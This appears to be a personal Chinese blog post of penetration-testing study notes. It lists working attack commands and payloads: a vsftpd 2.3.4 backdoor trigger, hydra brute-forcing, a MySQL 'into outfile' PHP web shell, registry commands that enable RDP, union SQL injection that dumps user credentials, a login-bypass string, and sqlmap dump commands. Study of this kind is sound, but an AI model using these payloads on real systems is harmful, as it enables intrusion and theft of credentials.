没办法,今天只能把学习的文档发了,没时间细整理这些如何操作,等回家有时间再搞吧,记录自己每天,不忘就好!,nice!~加油!

--2019-2-27

信息收集 #nmap SYN——>RST(close) SYN——>SYN、ACK(open) -sS(匿名扫描) -sT(全连接扫描) --scipte=vuln(漏洞扫描) -Pn 不做Ping扫描 -n 不做DNS解析 -T0-5 -sV (扫描服务版本信息)

常用的端口:

21 (vsftp2.3.4)
User:asdasd:)
Pass:
nc IP 6200
22 (爆破)
23 (爆破)
hydra:
-l(指定用户名)
-L(指定用户名字典文件)
-p(指定密码)
-P(指定密码字典)
hydra -l administrator -P Top1500.txt telnet://IP:端口
80
信息收集:
目录扫描:
内网渗透:
135 (ms03_026)
445 (ms08_067、ms17_010) run/post/manage/rdp_enable
1433 (mssql_exec)
3306 (远程连接、读写权限)
Ubuntu:/etc/apache2/apache2.conf
CentOS:/etc/httpd/conf/httpd.conf
select load_file('C:/1.txt');
select '<?php @eval($_POST[shell]);?>' into outfile '/var/www/html/shell.php'
3389(ms12_020)

CMD开启3389:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
/v (路径)
/t (名称)
/d (类型)
/f (值)
CMD开启Telnet:
sc config TlntSvr start= auto(自动)
net start telnet

Web安全:
静态网站:
html、htm
客户端————>服务器
动态网站:
asp、aspx、php、jsp、python
客户端————>服务器————>数据库

动态网站的架构:

1.操作系统
Windows:Windows 2003、Windows 200
03
Linux;red hat、debian、Ubuntu Server、CentOS
2.解析器
IIS、apache、nginx、tomcat
3.数据库
mssql、mysql
4.脚本语言
asp、aspx、php、jsp、python

信息收集:
判断网站是什么脚本语言:
手工猜测
目录扫描;
Kali dirb http://IP 字典.txt
御剑
WEB响应码:200存在的脚本文件、301目录

如何区分一个Web服务器是Windows系统还是Linux系统
Windows:不区分大小写
Linux:区分大小写

$_GET //在URL里接受
$_POST //在数据包里接受
$_COOKIE
$_REQUEST //接受任何方式

MySQL数据5.0以上有一个information_schema的数据库
information_schema //存储MySQL数据库下所有的数据库信息
"."代表下一级
information_schema.tables //存储MySQL数据库下所有的表信息
information_schema.columns //存储MySQL数据库下所有的列信息
table_name //表名
column_name //列名

SQL注入的作用是什么

  1. 只要拿到数据库的信息。
  2. 找到后台,找到上传点,上传一句话木马,连接菜刀。

SQL注入:

$_GET型注入
数字型:

$sql = "select * from dedsec_news where dedsec_id = $id";
and 1=1
and 1=2
order by 8
union select 1,2,3,4,5,6,7,8
union select user(),database(),version(),4,5,6,7,8
union select 1,table_name,3,4,5,6,7,8 from information_schema.tables where table_schema='watchdog'
union select 1,column_name,3,4,5,6,7,8 from information_schema.columns where table_name='dedsec_users'
union select 1,dedsec_user,dedsec_pwd,4,5,6,7,8 from watchdog.dedsec_users

字符型:

$sql = "select * from dedsec_news where dedsec_id = '$id'";

$id = mysql_real_rscape_string($id); //自动转移特殊字符串
dvwa 转换为hex 0x64767761

$_POST型注入

万能密码:

User:admin' or '1'='1
Pass:admin' or '1'='1
$query = "SELECT * FROM <code>users</code> WHERE user = '$user' AND password = '$pass';";
$query = "SELECT * FROM users WHERE user = 'admin' or '1'='1' AND password = 'admin' or '1'='1';";

WEB页面的暴力破解:
Burpsuite
浏览器设置代理为:127.0.0.1:8080
通过字节长度判断正确的密码

SQLmap: sqlmap -u URL --tables
sqlmap -u URL -D "" -T "" --columns
sqlmap -u URL -D "" -T "" -C "1,2" --dump

start /b
python RASscan.py IP IP > log.txt &

MIME漏洞
JPG
image/jpeg

%00截断

最后修改:2019 年 06 月 13 日 11 : 59 PM
如果觉得我的文章对你有用,请随意赞赏